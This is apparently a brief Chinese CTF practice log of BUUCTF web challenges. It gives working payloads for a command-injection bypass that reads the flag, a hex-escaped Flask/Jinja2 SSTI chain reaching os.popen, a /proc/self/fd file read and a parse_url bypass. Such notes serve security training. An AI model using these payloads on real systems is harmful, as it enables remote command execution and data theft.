buu刷题2
EasyBypass
?comm1=index.php";m4 /fla?;" |
[pasecactf_2019]flask_ssti
{{config["\x5f\x5fclass\x5f\x5f"]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["os"]["popen"]("whoami")["read"]()}} |
由于文件之前是有被打开过的,所以可以直接使用读取prod来读取
/proc/self/fd/3 |
[安洵杯 2019]iamthinking
parse_url用///public/?payload=来绕过